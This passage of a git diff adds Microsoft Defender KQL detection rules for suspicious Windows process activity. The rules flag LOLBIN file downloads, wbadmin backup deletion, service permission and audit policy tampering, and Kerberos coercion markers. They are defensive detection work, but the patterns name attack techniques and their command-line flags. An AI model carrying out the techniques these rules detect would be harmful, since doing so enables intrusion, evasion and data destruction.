+| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql
new file mode 100644
index 00000000..282b4570
--- /dev/null
+++ b/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Add Windows Capability Via PowerShell Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql
new file mode 100644
index 00000000..53dbd2bb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql
@@ -0,0 +1,10 @@
+// Title: AddinUtil.EXE Execution From Uncommon Directory
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql
new file mode 100644
index 00000000..1c055f70
--- /dev/null
+++ b/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql
@@ -0,0 +1,12 @@
+// Title: AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: medium
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not(InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql
new file mode 100644
index 00000000..2390cd58
--- /dev/null
+++ b/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql
@@ -0,0 +1,12 @@
+// Title: All Backups Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: high
+// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..ee4e890d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: high
+// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")) and (not(InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql
new file mode 100644
index 00000000..3689f997
--- /dev/null
+++ b/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Always Install Elevated MSI Spawned Cmd And Powershell
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql b/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql
new file mode 100644
index 00000000..8501908f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql
@@ -0,0 +1,14 @@
+// Title: Always Install Elevated Windows Installer
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+// False Positives:
+//   - System administrator usage
+//   - Anti virus products
+//   - WindowsApps located in "C:\Program Files\WindowsApps\"
+
+DeviceProcessEvents
+| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")))) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql
new file mode 100644
index 00000000..c7b87fa2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Application Removed Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-28
+// Level: medium
+// Description: Detects the removal or uninstallation of an application via "Wmic.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql
new file mode 100644
index 00000000..331de52b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Application Terminated Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects calls to the "terminate" function via wmic in order to kill an application
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql
new file mode 100644
index 00000000..a81e8577
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary Binary Execution Using GUP Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Other parent binaries using GUP not currently identified
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
new file mode 100644
index 00000000..e5e3794a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate administrator usage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")) and (not(((ProcessCommandLine contains "C:\\ProgramData\\CSScriptNpp\\" and ProcessCommandLine contains "-cscs_path:" and ProcessCommandLine contains "\\cs-script\\cscs.dll") and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Notepad++\\notepad++.exe", "C:\\Program Files\\Notepad++\\notepad++.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql
new file mode 100644
index 00000000..841d0dc5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
+// Users can configure different pilot collections for each of the co-management workloads.
+// It can be abused by attackers in order to upload or download files.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
new file mode 100644
index 00000000..d724539f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and FolderPath endswith "\\GfxDownloadWrapper.exe") and (not(ProcessCommandLine contains "https://gameplayapi.intel.com/"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql
new file mode 100644
index 00000000..9f47fb3a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via IMEWDBLD.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql
new file mode 100644
index 00000000..24155d2f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql
new file mode 100644
index 00000000..52743a07
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSOHTMED.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSOHTMED" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql
new file mode 100644
index 00000000..02fb0133
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSPUB.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql
new file mode 100644
index 00000000..6c3ffac9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql
new file mode 100644
index 00000000..a9df2741
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary File Download Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+//   - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql
new file mode 100644
index 00000000..2343874d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary MSI Download Via Devinit.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql
new file mode 100644
index 00000000..785b6fc6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
+// MITRE Tactic: Execution
+// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql b/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql
new file mode 100644
index 00000000..ac55367d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql
@@ -0,0 +1,10 @@
+// Title: AspNetCompiler Execution
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql
new file mode 100644
index 00000000..981daf77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Assembly Loading Via CL_LoadAssembly.ps1
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
new file mode 100644
index 00000000..8d1920bf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
@@ -0,0 +1,16 @@
+// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-20
+// Level: high
+// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
+// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
+// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
+// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
+// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
+// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
+// or checking for the presence of such records through the `nslookup` command.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UWhRCA" and ProcessCommandLine contains "BAAAA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql b/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql
new file mode 100644
index 00000000..86e5aa7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Audio Capture via PowerShell
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects audio capture via PowerShell Cmdlet.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+//   - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql b/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql
new file mode 100644
index 00000000..c8a4540e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql
@@ -0,0 +1,12 @@
+// Title: Audio Capture via SoundRecorder
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detect attacker collecting audio via SoundRecorder application.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+//   - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql
new file mode 100644
index 00000000..2928004b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql
@@ -0,0 +1,13 @@
+// Title: Audit Policy Tampering Via Auditpol
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps)
+// Date: 2021-02-02
+// Level: high
+// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
+// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+//   - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
new file mode 100644
index 00000000..75a6e4f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
@@ -0,0 +1,13 @@
+// Title: Audit Policy Tampering Via NT Resource Kit Auditpol
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
+// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+//   - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none"
\ No newline at end of file
